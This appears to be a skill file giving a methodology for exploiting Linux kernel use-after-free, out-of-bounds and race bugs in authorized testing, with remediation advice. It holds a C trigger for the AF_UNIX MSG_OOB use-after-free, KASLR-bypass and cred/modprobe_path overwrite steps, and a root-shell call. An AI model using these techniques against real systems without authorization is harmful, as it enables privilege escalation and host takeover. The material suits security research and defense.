---
name: exploiting-linux-kernel-vulnerabilities
description: Methodology for discovering and exploiting Linux kernel memory-corruption vulnerabilities (UAF, OOB read/write,
race/TOCTOU, type confusion) during authorized engagements, covering reachability analysis, building stable read/write
primitives from a single bug, defeating KASLR/SMEP/SMAP/KPTI, slab/buddy heap grooming, and pivoting to ring-0 code
execution or credential overwrite for local privilege escalation.
domain: cybersecurity
subdomain: binary-exploitation
tags:
- binary-exploitation
- linux-kernel
- exploit-development
version: '1.0'
author: xalgorix
license: Apache-2.0
---
# Exploiting Linux Kernel Vulnerabilities
## When to Use
- During authorized kernel security assessments, local privilege-escalation (LPE) research, or sandbox-escape work where
unprivileged userland can reach kernel code through a syscall, ioctl, socket family, netlink, or a vulnerable driver.
- When triaging a kernel crash (`Oops`, `KASAN` splat, `general protection fault`, `BUG: KASAN: use-after-free`) and you
need to determine whether the bug is a controllable UAF, OOB, double-free, or race rather than a pure null-deref DoS.
- When a recent CVE (e.g., AF_UNIX `MSG_OOB` UAF / CVE-2025-38236, POSIX CPU-timers TOCTOU / CVE-2025-38352, ksmbd
OOB write / CVE-2025-37947) is in scope and you must confirm reachability and exploitability on the target build.
- As the methodology that turns a weak kernel primitive (a 1-byte read, a `+N` increment, a single freed object) into
full kernel read/write/execute.
## Critical: Concepts/Steps Most Often Missed
- **A KASAN splat is not yet a primitive.** A reported UAF/OOB only proves corruption. You must show the freed/overflowed
object is *reclaimable into attacker-controlled memory* and that the corrupted field is *security-relevant* (a function
pointer, a length, a `cred*`, a list head). The AF_UNIX bug, for example, only matters once the dangling `oob_skb` is
reallocated into a pipe page you control.
- **Trusting the kernel version string.** Vendors backport both buggy and fixed patches. Check for the actual fixing
commit (e.g., `32ca245464e1` for the AF_UNIX OOB fix) and the relevant `CONFIG_*` gate (`CONFIG_AF_UNIX_OOB`,
`CONFIG_RANDOMIZE_KSTACK_OFFSET`, `CONFIG_INIT_STACK_ALL_ZERO`) rather than the release banner.
- **Ignoring usercopy hardening.** `__check_object_size()` / `__check_heap_object()` reject copies against `.text` and
specialized caches and return `-EFAULT` *without crashing*. Reads/writes against `.data`, `.bss`, vmemmap, per-CPU
vmalloc ranges, other threads' kernel stacks, and direct-map pages generally succeed — design the primitive around what
is allowed.
- **Forgetting modern mitigations.** SMEP blocks executing userland code in ring 0; SMAP blocks reading/writing userland
in kernel context (note: x86_64 disables SMAP *inside* `copy_to_user`); KPTI splits page tables; KASLR + per-syscall
`RANDOMIZE_KSTACK_OFFSET` randomize layout; CFI/`CONFIG_CFI_CLANG` constrains indirect calls. Each forces a data-only
or ROP-based path instead of naive `ret2usr`.
- **Non-deterministic heap state.** Skipping slab grooming makes reallocation unreliable. Drain per-CPU freelists, defeat
SLUB freelist randomization with mass spray, and account for per-CPU partial/page lists before expecting a freed object
to come back under your control.
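The `CONFIG_*` check from the version-string bullet can be sketched in C. This is a minimal illustration, assuming the config text has already been read into memory (for example from `/boot/config-$(uname -r)`); `config_enabled` is a hypothetical helper name, not an existing API. It reports only how the kernel was built, so the presence of a fixing commit still has to be verified separately.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Return true if `config_text` (the contents of a kernel .config) contains
 * the exact line "<option>=y". Lines such as "# CONFIG_X is not set" or a
 * longer option that merely starts with the same name do not match. */
bool config_enabled(const char *config_text, const char *option)
{
    size_t opt_len = strlen(option);
    const char *line = config_text;

    while (line && *line) {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);

        /* The line must be exactly "<option>=y": same length, same bytes. */
        if (len == opt_len + 2 &&
            strncmp(line, option, opt_len) == 0 &&
            strncmp(line + opt_len, "=y", 2) == 0)
            return true;

        line = eol ? eol + 1 : NULL;
    }
    return false;
}
```

Matching the whole line is a deliberate choice: a substring search for `CONFIG_AF_UNIX` would also hit `CONFIG_AF_UNIX_OOB` and the `is not set` comment form.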
### How to CONFIRM
Build the target kernel with KASAN enabled (stock distro kernels normally ship without it), boot it under QEMU, and
attach `gdb` to the QEMU gdbstub (`qemu-system-x86_64 -s -S`, then load `vmlinux` symbols and run
`target remote :1234`). Trigger the bug from a minimal C reproducer; a KASAN
report naming `use-after-free` / `out-of-bounds` at a known function **confirms** the corruption class and the faulting
object/cache. Then prove control: reallocate the object with a spray of known marker bytes and read them back through the
primitive. If your markers appear (e.g., `recv(MSG_OOB|MSG_PEEK)` returns the byte you planted), the primitive is real,
not just a crash.
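When many console logs need triage, the first confirmation step (reading the corruption class off the KASAN header) can be automated. The sketch below assumes the usual `BUG: KASAN: <type> in <function>` header layout; the enum and `classify_kasan` are hypothetical names introduced for illustration.

```c
#include <string.h>

enum bug_class { BUG_UNKNOWN, BUG_UAF, BUG_OOB, BUG_BAD_FREE, BUG_NULL_DEREF };

/* Classify one log line by the bug-type token that follows "BUG: KASAN: ".
 * Substring matching covers prefixed variants such as "slab-use-after-free"
 * and "stack-out-of-bounds". */
enum bug_class classify_kasan(const char *line)
{
    static const char prefix[] = "BUG: KASAN: ";
    char type[64];
    const char *p = strstr(line, prefix);
    size_t n;

    if (!p)
        return BUG_UNKNOWN;

    /* Copy the token up to the next space or newline into a local buffer. */
    p += sizeof(prefix) - 1;
    n = strcspn(p, " \n");
    if (n >= sizeof(type))
        n = sizeof(type) - 1;
    memcpy(type, p, n);
    type[n] = '\0';

    if (strstr(type, "use-after-free"))
        return BUG_UAF;
    if (strstr(type, "out-of-bounds"))
        return BUG_OOB;
    if (strcmp(type, "double-free") == 0 || strcmp(type, "invalid-free") == 0)
        return BUG_BAD_FREE;
    if (strcmp(type, "null-ptr-deref") == 0)
        return BUG_NULL_DEREF;
    return BUG_UNKNOWN;
}
```

A result of `BUG_NULL_DEREF` or `BUG_UNKNOWN` is a hint that the crash may be a plain DoS. The other classes still need the marker-byte proof described above before they count as a primitive.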
## Workflow
### Step 1: Establish Reachability and Profile the Target
```bash
uname -r # kernel release (verify against the fixing commit, do not trust alone)
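# KASLR is CONFIG_RANDOMIZE_BASE, KPTI is CONFIG_(MITIGATION_)PAGE_TABLE_ISOLATION; SMEP/SMAP are CPU features, not config options
grep -E 'RANDOMIZE_BASE|PAGE_TABLE_ISOLATION|CFI_CLANG|RANDOMIZE_KSTACK|AF_UNIX_OOB|INIT_STACK' "/boot/config-$(uname -r)"
grep -m1 -owE 'smep|smap' /proc/cpuinfo | sort -u # SMEP/SMAP support as reported by the CPU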
cat /proc/sys/kernel/kptr_restrict /proc/sys/kernel/perf_event_paranoid
ls -l /dev/ | grep -i <driver> # reachable device nodes for ioctl bugs
```
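SMEP and SMAP are CPU features rather than build options, so they appear in the `flags` line of `/proc/cpuinfo`. A minimal sketch of a whole-word flag check in C follows; it assumes the `flags` line has already been read into a string, and `has_cpu_flag` is a hypothetical helper name.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Return true if `flag` appears as a whole word in a /proc/cpuinfo
 * "flags" line, so that "smap" does not match "smap_something". */
bool has_cpu_flag(const char *flags, const char *flag)
{
    size_t flag_len = strlen(flag);
    const char *p = flags;

    if (flag_len == 0)
        return false;

    while ((p = strstr(p, flag)) != NULL) {
        /* A match counts only if it is delimited on both sides. */
        bool starts = (p == flags) || p[-1] == ' ' || p[-1] == '\t';
        char end = p[flag_len];
        bool ends = (end == '\0' || end == ' ' || end == '\n');

        if (starts && ends)
            return true;
        p += flag_len;
    }
    return false;
}
```

The flag shows that the CPU supports the feature. Whether the running kernel has it enabled can still depend on boot parameters, so treat the result as a profile hint.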
Confirm an unprivileged process can reach the vulnerable code path (syscall/ioctl/socket). Write a minimal C trigger:
```c
int s[2]; socketpair(AF_UNIX, SOCK_STREAM, 0, s); // example: AF_UNIX MSG_OOB UAF reachability
for (int i = 0; i < 2; i++) { send(s[1], "A", 1, MSG_OOB); recv(s[0], &b, 1, MSG_OOB); }
send(s[1], "A", 1, MSG_OOB);
recv(s[0], &b, 1, 0); // normal recv frees oob_skb
recv(s[0], &b, 1, MSG_OOB); // dangling u->oob_skb -> UAF
```
### Step 2: Convert the Bug into a Stable Primitive
```text
UAF -> reallocate freed object with controlled data (msg_msg, sk_buff, pipe_buffer, setxattr, user_key_payload)
OOB write -> overwrite an adjacent object's length/pointer to widen into arbitrary write
+N inc bug -> position a sensitive 64-bit value at the incremented offset (e.g., shift a length field by +4 GiB)
race/TOCTOU-> win the window with a stalling thread (mprotect/mmap-lock, MADV_DONTNEED hole) to freeze a copy mid-flight
```
Aim for two reusable primitives: an **arbitrary read** (leak) and an **arbitrary write** (control). The AF_UNIX case
yields a repeatable 1-byte read via `recv(MSG_OOB|MSG_PEEK)` and a `+1` increment write when `MSG_PEEK` is clear.
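The jump from a `+1` increment to a `+4 GiB` change is plain little-endian arithmetic: incrementing the 32-bit word that forms the upper half of a 64-bit field adds 2^32 to that field. The sketch below demonstrates this on an ordinary userspace buffer, using the 0x40/0x44 offsets quoted in the Output Format example; `inc32_at` and `read64_at` are hypothetical helper names, and a little-endian host such as x86_64 is assumed.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Add `delta` to the 32-bit word at byte offset `off` inside `obj`,
 * leaving every other byte untouched. */
void inc32_at(unsigned char *obj, size_t off, uint32_t delta)
{
    uint32_t v;

    memcpy(&v, obj + off, sizeof(v));
    v += delta;
    memcpy(obj + off, &v, sizeof(v));
}

/* Read the 64-bit value that starts at byte offset `off`. */
uint64_t read64_at(const unsigned char *obj, size_t off)
{
    uint64_t v;

    memcpy(&v, obj + off, sizeof(v));
    return v;
}
```

If a buffer holds the 64-bit value `0x1000` at offset 0x40, calling `inc32_at(buf, 0x44, 1)` makes `read64_at(buf, 0x40)` return `0x1000 + (1ULL << 32)`. This is why the position of the incremented word relative to a wider field matters more than the size of the increment.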
### Step 3: Defeat KASLR and Leak Kernel Base
```text
# Read a fixed-mapping IDT descriptor and subtract the known handler offset to recover kernel base:
CPU_ENTRY_AREA_RO_IDT_VADDR = 0xfffffe0000000000
kernel_base = leaked_idt_handler - known_offset_in_vmlinux
```
Use the read primitive to walk `.data` (kmem_cache bases), vmemmap (page type/freelist), and per-CPU vmalloc segments to
predict the next allocation address of key caches (`skbuff_head_cache`, `kmalloc-cg-192`). Walk `pgd_list` to locate the
current `mm_struct`'s root `pgd` when `mm_struct` itself is usercopy-blocked.
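A computed base is worth sanity-checking before anything depends on it. The sketch below applies the subtraction from this step and then tests the result against the x86_64 layout. The constants are assumptions: a kernel text mapping starting at `0xffffffff80000000`, a 1 GiB image window, and 2 MiB alignment (the default `CONFIG_PHYSICAL_ALIGN`). The function names are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumed x86_64 layout constants; verify them against the target build. */
#define KERNEL_MAP_START 0xffffffff80000000ULL /* start of kernel text mapping */
#define KERNEL_MAP_END   0xffffffffc0000000ULL /* start + 1 GiB image window */
#define KERNEL_ALIGN     0x200000ULL           /* 2 MiB alignment */

/* kernel_base = leaked pointer - that symbol's offset inside vmlinux. */
uint64_t candidate_base(uint64_t leaked, uint64_t offset_in_vmlinux)
{
    return leaked - offset_in_vmlinux;
}

/* A plausible base lies inside the mapping window and is 2 MiB aligned. */
bool plausible_kernel_base(uint64_t base)
{
    return base >= KERNEL_MAP_START &&
           base < KERNEL_MAP_END &&
           (base % KERNEL_ALIGN) == 0;
}
```

A base that fails this check usually means the wrong `vmlinux` offset was used or the leaked value was not the expected pointer. Stopping at that point is cheaper than debugging a later crash.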
### Step 4: Pivot to Kernel R/W/X and Escalate
```text
# Data-only escalation (preferred, bypasses SMEP/KPTI/CFI):
1. Locate current task's cred via init_task / per-CPU current
2. Overwrite cred->uid/gid/euid/egid/cap_effective with 0 / full caps
3. Or overwrite struct file f_op, modprobe_path ("/sbin/modprobe" -> "/tmp/x"), or core_pattern
# PTE-overwrite escalation (full R/W/X):
1. Arrange a process-owned PTE page immediately after a controlled page (buddy adjacency in same 2 MiB block)
2. Use the OOB/overflow write to forge PTE entries -> map kernel physical memory RWX, disable SMEP/SMAP bits
```
```c
// after data-only cred overwrite:
setresuid(0,0,0); system("/bin/sh"); // demonstrate root
```
## Key Concepts
| Concept | Description |
|---------|-------------|
| **UAF (use-after-free)** | A freed object is still referenced; reclaiming it with controlled data hijacks behavior. |
| **OOB read/write** | Access past an allocation's bounds, corrupting/leaking an adjacent object's metadata. |
| **TOCTOU / race** | A check and its use are separated in time; a stalling thread widens the window so the race is won more reliably. |
| **Slab grooming** | Shaping SLUB per-CPU/partial freelists so a freed object is reclaimed by an attacker object. |
| **Buddy recycling** | Pushing a slab page back to the page allocator to reuse it as a pipe buffer, stack, or PTE page. |
| **KASLR bypass** | Leaking a fixed-mapping pointer (IDT) to recover the randomized kernel base. |
| **SMEP/SMAP/KPTI/CFI** | Mitigations that block ret2usr, userland access, page-table sharing, and indirect-call hijack. |
| **Data-only attack** | Escalating by overwriting `cred`, `modprobe_path`, or `core_pattern` instead of hijacking control flow. |
## Tools & Systems
| Tool | Purpose |
|------|---------|
| **QEMU + gdb (vmlinux)** | Boot the target kernel, attach to the gdbstub (`-s -S`), set breakpoints, inspect slab/stack. |
| **KASAN / KFENCE** | Sanitizer builds that pinpoint UAF/OOB with object and cache attribution. |
| **pwntools** | Userland exploit scaffolding, struct packing (`p64`), process control, payload staging. |
| **gef / pwndbg** | Kernel-aware gdb extensions: `slab`, `ksymaddr`, page-table walking, register/stack views. |
| **crash / drgn** | Live-kernel and vmcore introspection of `task_struct`, `cred`, `kmem_cache`, `pgd_list`. |
| **vmlinux-to-elf / ropper** | Recover symbols from a stripped kernel image; find ROP/JOP gadgets for stack pivots. |
| **syzkaller / trinity** | Fuzzers to discover and minimize reachable kernel bugs in scope. |
## Common Scenarios
### Scenario 1: AF_UNIX MSG_OOB UAF to LPE (CVE-2025-38236)
A flawed `manage_oob()` refactor leaves `u->oob_skb` dangling after a normal `recv()` frees the OOB SKB. Reclaiming the
slab page as a pipe buffer yields a repeatable 1-byte read and a `+4 GiB` increment of a length field; recycling the page
as a thread's kernel stack lets the increment inflate a `copy_page_from_iter()` length, overflowing into an adjacent PTE
page for arbitrary kernel R/W and root.
### Scenario 2: ioctl OOB write in a vendor driver
An unprivileged `ioctl` with an attacker-controlled length writes past a `kmalloc-512` object. Spray `msg_msg` objects to
place a controllable header adjacent, corrupt its size to build an arbitrary read, leak kernel base via IDT, then
overwrite `modprobe_path` with `/tmp/x` and execute a file with an unknown binary format so the kernel runs `/tmp/x` as root.
### Scenario 3: TOCTOU in POSIX CPU timers (CVE-2025-38352)
A race between timer expiry and task teardown corrupts kernel state. A stalling thread (blocking on the mmap lock via
`mprotect()` over a `MADV_DONTNEED` hole) holds the window open so the race is won far more reliably, converting a
flaky race into a dependable freed-object reuse.
### Scenario 4: Data-only cred overwrite under CFI
On a kernel with CFI + SMEP + KPTI, control-flow hijack is impractical. Instead, the arbitrary write is aimed at the
current task's `cred` structure, zeroing `uid/gid/euid/egid` and setting full `cap_effective`, granting root without
ever executing injected code or violating CFI.
## Output Format
```
## Linux Kernel Exploitation Finding
**Vulnerability**: Use-after-free in AF_UNIX MSG_OOB handling (CWE-416)
**CVE**: CVE-2025-38236
**Severity**: High (local privilege escalation / sandbox escape)
**Target**: Ubuntu 6.9.x (CONFIG_AF_UNIX_OOB=y, fixing commit 32ca245464e1 NOT backported)
**Reachable From**: Unprivileged user via AF_UNIX SOCK_STREAM socketpair (no CAP_* required)
### Primitive Proof
- Trigger: stacked zero-length OOB SKBs + normal recv() frees live u->oob_skb
- Read: recv(MSG_OOB|MSG_PEEK) returns planted marker byte from reclaimed pipe page (repeatable)
- Write: recv(MSG_OOB) increments consumed field at offset 0x44 (+1, scaled to +4 GiB at 0x40)
- KASLR: kernel base leaked via IDT @ 0xfffffe0000000000
### Exploitation Path
UAF -> pipe-page realloc -> 1-byte arbitrary read -> kernel base + pgd
-> recycle page as thread stack -> inflate copy length -> PTE-page overwrite -> kernel RWX
-> overwrite current cred -> uid=0. Demonstrated `id` => uid=0(root).
### Impact
Full local privilege escalation to root / container-to-host escape from an unprivileged context.
### Recommendation
1. Apply upstream fix 32ca245464e1 (revalidate SKBs in manage_oob); rebuild/redeploy.
2. Set CONFIG_AF_UNIX_OOB=n unless OOB is required; filter MSG_OOB/MSG_PEEK in seccomp sandbox profiles.
3. Enable CONFIG_RANDOMIZE_KSTACK_OFFSET, CONFIG_INIT_STACK_ALL_ZERO, CFI, SMEP/SMAP, KPTI.
4. Add slab freelist hardening (CONFIG_SLAB_FREELIST_RANDOM, CONFIG_SLAB_FREELIST_HARDENED) and monitor abnormal pipe/page-table churn.
```